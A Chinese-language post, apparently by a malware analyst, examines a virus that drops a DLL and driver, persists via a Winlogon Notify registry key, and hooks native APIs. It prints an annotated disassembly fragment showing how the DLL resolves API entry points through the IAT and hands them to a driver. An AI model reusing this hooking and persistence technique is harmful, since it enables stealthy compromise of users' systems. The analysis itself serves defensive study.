分析病毒有些日子了,不过昨天见到的一个病毒还真是有点头疼,那东西释放了一个DLL和一个SYS,那个SYS是个驱动,另外,它还创建了HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon/Notify/TCPG4T这个键,通过这个键来引导TCPG4T.DLL。这个方法以前没有见过。TCPG4T.dll做了很多事,有下载文件的,监视注册表的,其中最厉害的就是它使用了msudp4.dll来挂接API,下面是部分代码:
push offset aNtwritevirtual ; lpProcName
.text:100048B1 push eax ; hModule
.text:100048B2 push offset aNtprotectvirtu ; lpProcName
.text:100048B7 push eax ; hModule
.text:100048B8 push offset aNtcreateproces ; lpProcName
.text:100048BD push eax ; hModule
.text:100048BE push offset aNtcreateproc_0 ; lpProcName
.text:100048C3 push eax ; hModule
.text:100048C4 push offset aLdrloaddll ; lpProcName
.text:100048C9 push eax ; hModule
.text:100048CA call GetProcAddress
.text:100048CF mov [ebp+InBuffer], eax
.text:100048D5 call GetProcAddress
.text:100048DA mov [ebp+var_C4], eax
.text:100048E0 call GetProcAddress
.text:100048E5 mov [ebp+var_C0], eax
.text:100048EB call GetProcAddress
.text:100048F0 mov [ebp+var_BC], eax
.text:100048F6 call GetProcAddress
.text:100048FB mov [ebp+var_B8], eax
.text:10004901 push offset aWininet_dll ; lpLibFileName
.text:10004906 call LoadLibraryA
.text:1000490B push offset aHttpsendreques ; lpProcName
.text:10004910 push eax ; hModule
.text:10004911 call GetProcAddress
.text:10004916 mov [ebp+var_C8], eax
.text:1000491C mov eax, offset loc_10004A01
.text:10004921 add eax, [eax+1] ; OpenProcess的IAT项
.text:10004924 add eax, 5
.text:10004927 mov eax, [eax+2]
.text:1000492A mov eax, [eax]
.text:1000492C mov [ebp+var_B4], eax
.text:10004932 mov eax, offset loc_10004A06
.text:10004937 add eax, [eax+1]
.text:1000493A add eax, 5
.text:1000493D mov eax, [eax+2]
.text:10004940 mov eax, [eax]
.text:10004942 mov [ebp+var_B0], eax
.text:10004948 mov eax, offset loc_10004A0B
.text:1000494D add eax, [eax+1]
.text:10004950 add eax, 5
.text:10004953 mov eax, [eax+2]
.text:10004956 mov eax, [eax]
.text:10004958 mov [ebp+var_78], eax
.text:1000495B mov eax, offset loc_10001E48
.text:10004960 movzx eax, ax
.text:10004963 mov [ebp+var_74], eax
.text:10004966 mov eax, offset loc_100048A7
.text:1000496B add eax, [eax+1]
.text:1000496E add eax, 5
.text:10004971 mov eax, [eax+2]
.text:10004974 mov eax, [eax]
.text:10004976 mov [ebp+var_70], eax
.text:10004979 mov eax, offset loc_10004A10
.text:1000497E add eax, [eax+1]
.text:10004981 add eax, 5
.text:10004984 mov eax, [eax+2]
.text:10004987 mov eax, [eax]
.text:10004989 mov [ebp+var_6C], eax
.text:1000498C mov eax, offset loc_10004A15
.text:10004991 add eax, [eax+1]
.text:10004994 add eax, 5
.text:10004997 mov eax, [eax+2]
.text:1000499A mov eax, [eax]
.text:1000499C mov [ebp+var_68], eax
.text:1000499F mov eax, offset loc_10004A1A
.text:100049A4 add eax, [eax+1]
.text:100049A7 add eax, 5
.text:100049AA mov eax, [eax+2]
.text:100049AD mov eax, [eax]
.text:100049AF mov [ebp+var_64], eax
.text:100049B2 mov eax, offset loc_10004A1F
.text:100049B7 add eax, [eax+1]
.text:100049BA add eax, 5
.text:100049BD mov eax, [eax+2]
.text:100049C0 mov eax, [eax]
.text:100049C2 mov [ebp+var_60], eax
.text:100049C5 mov eax, offset sub_100024C7
.text:100049CA movzx eax, ax
.text:100049CD mov [ebp+var_5C], eax
.text:100049D0 mov eax, offset sub_1000247E
.text:100049D5 movzx eax, ax
.text:100049D8 mov [ebp+var_58], eax
.text:100049DB push 0 ; lpOverlapped
.text:100049DD push offset BytesReturned ; lpBytesReturned
.text:100049E2 push 0 ; nOutBufferSize
.text:100049E4 push 0 ; lpOutBuffer
.text:100049E6 push 78h ; nInBufferSize
.text:100049E8 lea eax, [ebp+InBuffer]
.text:100049EE push eax ; lpInBuffer
.text:100049EF push 0A00h ; dwIoControlCode
.text:100049F4 push hDevice ; hDevice
.text:100049FA call DeviceIoControl
.text:100049FF leave
.text:10004A00 retn
它首先根据WINDOWS下程序通过IAT调用真实API的道理,获得了API的入口点地址
.text:1000491C mov eax, offset loc_10004A01
.text:10004921 add eax, [eax+1] ;获得绝对地址,就那句JMP XXXXXXXX
.text:10004924 add eax, 5 ;因为CALL XXXXXXX代码本身长度为5
.text:10004927 mov eax, [eax+2] ;获得IAT地址
.text:1000492A mov eax, [eax] ;读出API入口
.text:1000492C mov [ebp+var_B4], eax ;压入缓冲区
这段就是获得入口地址的代码,接着,它使用DeviceIoControl使用msudp4.sys这个驱动